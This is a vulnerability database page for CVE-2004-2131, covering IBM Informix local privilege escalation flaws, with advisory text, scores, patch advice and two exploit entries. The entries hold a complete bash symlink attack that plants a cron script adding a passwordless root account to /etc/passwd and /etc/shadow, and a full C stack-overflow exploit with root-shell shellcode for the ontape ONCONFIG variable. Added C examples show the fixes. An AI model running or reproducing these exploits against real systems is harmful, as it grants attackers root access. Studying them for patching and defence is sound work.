CVE-2004-2131
CVSS 7.2
Published: 2004-01-27 00:00:00
Revised: 2016-10-17 23:06:49

[Original] Stack-based buffer overflow in ontape for IBM Informix Dynamic Server (IDS) 9.40.xC3 and earlier allows local users, with DSA privileges, to execute arbitrary code via a long ONCONFIG environment variable.


[CNNVD] IBM Informix multiple local privilege escalation vulnerabilities (CNNVD-200401-061)

        IBM Informix Dynamic Server is a database management system; Informix Extended Parallel Server (XPS) is a parallel-processing database server.
        IBM Informix Dynamic Server and Informix Extended Parallel Server contain security flaws that a local attacker can exploit to escalate privileges, access the file system and mount further attacks.
        These vulnerabilities can yield root privileges or read access to every file on the system. No detailed vulnerability information is currently available.
        

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [complete information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can take the system down completely]
Attack complexity: LOW [no special access conditions are required to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/a:ibm:informix_extended_parallel_server:8.40_uc1    IBM Informix Extended Parallel Server 8.40 UC1
cpe:/a:ibm:informix_dynamic_server:9.40.uc2              IBM Informix IDS 9.40.UC2
cpe:/a:ibm:informix_dynamic_server:9.40.uc1              IBM Informix IDS 9.40.UC1

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2131
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2131
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200401-061
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=107539878804074&w=2
(UNKNOWN)  BUGTRAQ  20040129 ----------========== OPEN3S-2003-08-08-eng-informix-ontape
http://www-1.ibm.com/support/docview.wss?uid=swg21153336
(VENDOR_ADVISORY)  CONFIRM  http://www-1.ibm.com/support/docview.wss?uid=swg21153336
http://www.securityfocus.com/bid/9512
(VENDOR_ADVISORY)  BID  9512
http://xforce.iss.net/xforce/xfdb/14970
(VENDOR_ADVISORY)  XF  informix-ontape-binary-bo(14970)

- Vulnerability information

IBM Informix multiple local privilege escalation vulnerabilities
High  Unknown
2004-01-27 00:00:00 2005-10-20 00:00:00
Local

- Advisories and patches

        Vendor patches:
        IBM
        ---
        Users running IBM Informix Dynamic Server 9.40.UC2 or earlier are advised to upgrade to IBM Informix Dynamic Server 9.40.UC3. Users running IBM Informix Extended Parallel Server releases earlier than 8.40.UD1 are advised to upgrade to IBM Informix Extended Parallel Server 8.40.UD1.
        Users can contact the vendor to obtain patches.

        http://www.ibm.com

- Vulnerability information (23609)

IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 Multiple Vulnerabilities (1) (EDBID:23609)
unix local
2003-08-08 Verified
0 pask
N/A
source: http://www.securityfocus.com/bid/9512/info

IBM Informix Dynamic Server and IBM Informix Extended Parallel Server have been reported prone to multiple vulnerabilities.

The first issue exists in the onedcu binary. Specifically, when the binary is invoked a predictable temporary file is created. A local attacker may exploit this issue to launch symbolic link style attacks ultimately resulting in elevated privileges.

The second issue that has been reported to exist in the ontape binary. The ontape binary has been reported to be prone to a local stack based buffer overflow vulnerability. Ultimately the attacker may exploit this condition to influence execution flow of the vulnerable binary into attacker-controlled memory. This may lead to the execution of arbitrary instructions with elevated privileges.

A third issue has been reported to affect the onshowaudit binary. Specifically, the onshowaudit binary reads data from temporary files contained in the "tmp" directory. These files have predictable filenames; an attacker may exploit this issue to disclose data that may be used in further attacks launched against the vulnerable system.

#!/bin/bash
#
# onedcu creates a temporary file with a predictable name ("\001") in the
# current directory and follows symlinks when it does so. Pointing that name
# at a not-yet-existing cron.hourly script makes the privileged program create
# the script; with umask 000 it comes out world-writable, so we can then fill
# it with our own payload and wait for cron to run it.

ONEDCU=/home/informix-9.40/bin/onedcu
CRONFILE=/etc/cron.hourly/pakito
USER=pakito
DIR=./trash

export INFORMIXDIR=/home/informix-9.40/
export ONCONFIG=onconfig.std

if [ -d "$DIR" ]; then
        echo "Trash directory already created"
else
        mkdir "$DIR"
fi

cd "$DIR" || exit 1
LINK=$(echo -e "\001")
if [ -L "./$LINK" ]; then
        echo "Link already created"
else
        ln -s "$CRONFILE" "$LINK"
fi

# let onedcu create the file through the link, then get rid of the process
umask 000
"$ONEDCU" &
kill -9 $!

# the cron script now exists, owned by the privileged user but world-writable
echo '#!/bin/bash' > "$CRONFILE"
echo "echo '$USER:x:0:0::/:/bin/bash' >> /etc/passwd" >> "$CRONFILE"
echo "echo '$USER::12032:0:99999:7:::' >> /etc/shadow" >> "$CRONFILE"
echo " "
echo "  This vulnerability was researched by Juan Manuel Pascual Escriba"
echo "  08/08/2003 Barcelona - Spain pask@open3s.com"
echo " "
echo "  must wait until cron execute $CRONFILE and then exec su pakito"
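The onedcu and onshowaudit issues are the same bug class: a privileged program opens a file whose name an unprivileged user can guess in advance, and open() follows whatever has been planted at that name. The following is an added example, not IBM's code and not part of the exploit above. It stages the attack in a scratch directory on the attacker's own uid (no root needed), with "victim" standing in for the root-owned cron script and "tmpfile" for the predictable name, and shows the naive open writing straight through the link while an O_CREAT|O_EXCL|O_NOFOLLOW open fails with EEXIST instead. Directory and file names are constructed for the demo.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* errno recorded from the hardened open in the last demo run */
static int g_exclusive_errno;

/* Shape of the onedcu/onshowaudit bug: fixed name, default flags, permissive
   mode. open() follows a symlink the attacker planted at PATH and, with
   O_CREAT, even creates the link's target. Returns 0 on success, -1 on error. */
int create_predictable(const char *path, const char *data)
{
        int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
        if (fd < 0)
                return -1;
        ssize_t n = write(fd, data, strlen(data));
        close(fd);
        return n == (ssize_t)strlen(data) ? 0 : -1;
}

/* Hardened: O_EXCL makes open() fail when anything already exists at PATH
   (a symlink counts, wherever it points); O_NOFOLLOW adds a second guard;
   mode 0600 keeps the content private regardless of umask. */
int create_exclusive(const char *path, const char *data)
{
        int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
        if (fd < 0)
                return -1;
        ssize_t n = write(fd, data, strlen(data));
        close(fd);
        return n == (ssize_t)strlen(data) ? 0 : -1;
}

/* Read PATH back into BUF; returns bytes read or -1. */
static ssize_t read_small_file(const char *path, char *buf, size_t cap)
{
        int fd = open(path, O_RDONLY);
        if (fd < 0)
                return -1;
        ssize_t n = read(fd, buf, cap - 1);
        close(fd);
        if (n < 0)
                return -1;
        buf[n] = '\0';
        return n;
}

/* Returns 1 if the naive open wrote through the planted link into "victim"
   and the hardened open refused, 0 if the naive open was not hijacked,
   3 if the hardened open also went through, -1 on setup trouble. */
int demo_symlink_attack(void)
{
        char dir[] = "/tmp/symdemo.XXXXXX";        /* constructed scratch dir */
        char victim[64], tmpfile[64], buf[64];
        int result = 0;

        if (mkdtemp(dir) == NULL)
                return -1;
        snprintf(victim, sizeof victim, "%s/victim", dir);
        snprintf(tmpfile, sizeof tmpfile, "%s/tmpfile", dir);

        /* attacker's move: dangling link from the predictable name to the target */
        if (symlink(victim, tmpfile) != 0)
                return -1;

        /* privileged program, naive: the file it "creates" is really victim */
        if (create_predictable(tmpfile, "attacker payload\n") == 0 &&
            read_small_file(victim, buf, sizeof buf) > 0 &&
            strcmp(buf, "attacker payload\n") == 0)
                result |= 1;

        /* privileged program, hardened: refuses because tmpfile already exists */
        errno = 0;
        if (create_exclusive(tmpfile, "never written\n") == 0)
                result |= 2;
        g_exclusive_errno = errno;

        unlink(tmpfile);
        unlink(victim);
        rmdir(dir);
        return result;
}

int exclusive_open_errno(void)
{
        return g_exclusive_errno;
}

int main(void)
{
        int r = demo_symlink_attack();
        printf("naive open wrote through the link: %s\n", (r & 1) ? "yes" : "no");
        printf("exclusive open failed with: %s\n", strerror(exclusive_open_errno()));
        return r == 1 ? 0 : 1;
}
```

mkstemp()/mkdtemp() give the same guarantee for genuinely temporary files; the O_EXCL form is what to reach for when the name is fixed by design, as the cron.hourly target is here. On kernels with fs.protected_symlinks the naive open would already be refused inside a sticky world-writable directory such as /tmp, which is why the demo uses a private directory of its own.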
		

- Vulnerability information (23610)

IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 Multiple Vulnerabilities (2) (EDBID:23610)
unix local
2003-08-08 Verified
0 pask
N/A
source: http://www.securityfocus.com/bid/9512/info
 

/* Exploit: informix user or a user with DSA privileges -> root on Informix IDS v9.40. There seems
to be a correct environment variable size check for INFORMIXDIR (an old security nightmare in
other versions) but they forgot to check the ONCONFIG env variable size.

We can find similar ONCONFIG overflows in other binaries of this installation, but there a
setuid32(0x1f7) (the uid of the informix user in my installation) happens before the bof occurs.
Unfortunately not in this binary.


Vulnerability researched by        Juan Manuel Pascual Escriba
08/08/2003 Barcelona - Spain       pask@open3s.com
http://www.open3s.com

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Linux/x86 payload: setresuid(0,0,0) then execve("/bin/sh") via the jmp/call trick */
char sc[]=
"\x29\xc0"                  /* sub eax,eax */
"\x29\xdb"                  /* sub ebx,ebx */
"\x29\xc9"                  /* sub ecx,ecx */
"\x29\xd2"                  /* sub edx,edx */
"\xb0\xa4"                  /* mov al,164     setresuid(0,0,0) */
"\xcd\x80"                  /* int 0x80 */
"\xeb\x1f"                  /* jmp +31       to the call below */
"\x5e"                      /* pop esi        esi -> "/bin/sh" */
"\x89\x76\x08"              /* mov [esi+8],esi     argv[0] */
"\x31\xc0"                  /* xor eax,eax */
"\x88\x46\x07"              /* mov [esi+7],al      NUL-terminate the string */
"\x89\x46\x0c"              /* mov [esi+12],eax    argv[1] = NULL */
"\xb0\x0b"                  /* mov al,11      execve */
"\x89\xf3"                  /* mov ebx,esi */
"\x8d\x4e\x08"              /* lea ecx,[esi+8] */
"\x8d\x56\x0c"              /* lea edx,[esi+12] */
"\xcd\x80"                  /* int 0x80 */
"\x31\xdb"                  /* xor ebx,ebx */
"\x89\xd8"                  /* mov eax,ebx */
"\x40"                      /* inc eax        exit */
"\xcd\x80"                  /* int 0x80 */
"\xe8\xdc\xff\xff\xff"      /* call -36      back to the pop esi */
"/bin/sh";


#define STACK_TOP_X86 0xC0000000UL
#define ALG_MASK 0xfffffff4UL
#define ADDR 560                    /* copies of the return address in the overflow */
#define DFL_ALG 4
#define INFORMIXDIR "/home/informix-9.40/"
#define ONTAPE "/home/informix-9.40/bin/ontape"


int main(int arc, char **arv){
        char *argv[2];
        char *envp[4];              /* ONCONFIG, INFORMIXDIR, shellcode carrier, NULL */
        unsigned long sc_address, ba=0;
        unsigned char alg = DFL_ALG;
        unsigned long *p;
        unsigned char *q;
        unsigned int i;

        /* calculate where in the stack our shellcode will be: execve() puts the program
           path just below the top of the stack and the environment strings below it,
           with the last env string (ours, "pete=<sc>") directly under the path */

        sc_address = STACK_TOP_X86 - 4 - strlen(ONTAPE) - sizeof(sc) - 1;
        printf("shellcode address = 0x%lX\n",sc_address);

        /* add trailing pad to align the shellcode if necessary */

        if( (sc_address & ALG_MASK) != sc_address ) {
                ba = sc_address - (sc_address & ALG_MASK);
                printf("adding %lu trailing bytes to backward align shellcode to 0x%lX\n", ba,
                       sc_address & ALG_MASK);
                sc_address = STACK_TOP_X86 - 4 - strlen(ONTAPE) - sizeof(sc) - ba - 1;
                printf("new shellcode address = 0x%lX\n",sc_address);
        }

        /* craft the environment string that carries the shellcode */
        envp[2] = (char*)malloc(sizeof(sc)+strlen("pete=")+1+ba);
        q = (unsigned char*)envp[2];
        strcpy((char*)q,"pete=");
        q += strlen("pete=");
        memcpy(q,sc,sizeof(sc));
        q += sizeof(sc)-1;
        memset(q,'A',ba);
        q += ba;
        *q = 0;

        /* build the overflowing buffer; an optional second argument overrides the alignment */

        alg = DFL_ALG;
        if(arc > 2) alg = atoi(arv[2]);
        printf("using alignment = %d in overflow buffer\n",alg);

        argv[0] = ONTAPE;
        argv[1] = 0;

        /* argv[] is done; the overflow is in an environment variable called ONCONFIG */

        envp[0] = (char*)malloc(ADDR*sizeof(unsigned long)+alg+1+strlen("ONCONFIG="));
        q = (unsigned char*)envp[0];
        strcpy((char*)q,"ONCONFIG=");
        q += strlen ("ONCONFIG=");
        memset(q,'A',alg);
        p=(unsigned long*)(envp[0]+alg+strlen("ONCONFIG="));
        for(i=0;i<ADDR;i++) {
                *p = sc_address;
                p++;
        }
        *p = 0;
        envp[1] = "INFORMIXDIR=/home/informix-9.40";
        envp[3] = 0;

        printf("executing %s ...\n\n",argv[0]);
        execve(argv[0],argv,envp);
        perror("execve");           /* only reached if the exec itself failed */
        return 1;
}
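The bug the exploit above rides is the one the advisory names: ontape copies the ONCONFIG environment value into a fixed stack buffer without checking its length, so 560 copies of a stack address end up where the saved return address was. What follows is an added example, not ontape's code and not from the exploit author: a reconstruction of that vulnerable shape next to a bounded version that rejects anything which does not fit, and also anything with a path separator, since ONCONFIG is meant to be a bare file name under $INFORMIXDIR/etc. The buffer size, the default directory and the sample inputs are assumptions made for the demo.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ONCONFIG_MAX 256   /* assumed size of the on-stack name buffer */

/* Vulnerable shape (reconstructed for contrast, not ontape's actual code): the
   environment value goes into a fixed stack buffer with no length check, so an
   ONCONFIG of ONCONFIG_MAX bytes or more overwrites the saved return address.
   Not called anywhere in this demo. */
void build_config_path_unchecked(char *out, const char *dir, const char *onconfig)
{
        char name[ONCONFIG_MAX];
        strcpy(name, onconfig);                 /* overflows when strlen(onconfig) >= ONCONFIG_MAX */
        sprintf(out, "%s/etc/%s", dir, name);   /* unbounded as well */
}

/* Hardened version. Returns 0 and fills OUT, or -1 when ONCONFIG is missing,
   empty, too long for the buffer, contains '/', or the result would not fit. */
int build_config_path(char *out, size_t outsz, const char *dir, const char *onconfig)
{
        if (dir == NULL || onconfig == NULL || *onconfig == '\0')
                return -1;
        if (strlen(onconfig) >= ONCONFIG_MAX)
                return -1;                      /* the exploit's 2 KB ONCONFIG stops here */
        if (strchr(onconfig, '/') != NULL)
                return -1;                      /* no traversal out of $INFORMIXDIR/etc */
        int w = snprintf(out, outsz, "%s/etc/%s", dir, onconfig);
        if (w < 0 || (size_t)w >= outsz)
                return -1;                      /* truncated: refuse rather than use a mangled path */
        return 0;
}

/* What a setuid program in ontape's position would do: resolve the path from
   the real environment, rejecting hostile values instead of copying them. */
int config_path_from_env(char *out, size_t outsz)
{
        const char *dir = getenv("INFORMIXDIR");
        const char *cfg = getenv("ONCONFIG");
        if (dir == NULL)
                dir = "/usr/informix";          /* assumed default for the demo */
        if (cfg == NULL)
                cfg = "onconfig";               /* assumed default for the demo */
        return build_config_path(out, outsz, dir, cfg);
}

/* Legitimate input, constructed for the demo. */
const char *demo_good_path(void)
{
        static char out[512];
        if (build_config_path(out, sizeof out, "/home/informix-9.40", "onconfig.std") != 0)
                return "";
        return out;
}

/* Three hostile inputs, constructed for the demo: a 2000-byte name like the
   exploit's ONCONFIG, a traversal, and an empty string. Returns how many were rejected. */
int demo_rejected_hostile_count(void)
{
        char out[512];
        char big[2001];
        int rejected = 0;

        memset(big, 'A', 2000);
        big[2000] = '\0';
        rejected += build_config_path(out, sizeof out, "/home/informix-9.40", big) == -1;
        rejected += build_config_path(out, sizeof out, "/home/informix-9.40", "../../etc/passwd") == -1;
        rejected += build_config_path(out, sizeof out, "/home/informix-9.40", "") == -1;
        return rejected;
}

int main(void)
{
        char out[512];
        printf("good: %s\n", demo_good_path());
        printf("hostile inputs rejected: %d of 3\n", demo_rejected_hostile_count());
        printf("from environment: %s\n",
               config_path_from_env(out, sizeof out) == 0 ? out : "(rejected)");
        return 0;
}
```

The length check is the fix for the overflow itself; the separator check is there because a setuid program that opens a user-named file under a trusted directory has a second problem the moment the name can contain "..". The exploit author's remark that other binaries call setuid32() to the informix uid before the overflow is the complementary defence: drop privileges before touching anything from the environment, so a bug that survives is worth the informix account rather than root.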


		

- Vulnerability information

3759
IBM Informix Database ontape Overflow
Local Access Required; Authentication Management, Input Manipulation
Loss of Integrity, Loss of Availability

- Vulnerability description

A local overflow exists in IBM's Informix Database. The "ontape" binary contains a boundary error resulting in a buffer overflow. With a specially crafted request, an attacker can gain root privileges, resulting in a loss of confidentiality, integrity, and/or availability.

- Timeline

2004-01-28 Unknown
Unknown Unknown

- Solution

Upgrade to IBM Informix Dynamic Server 9.40.UC3 or IBM Informix Extended Parallel Server 8.40.UD1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete
 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of MITRE Corporation; their official data sources are maintained on MITRE's websites.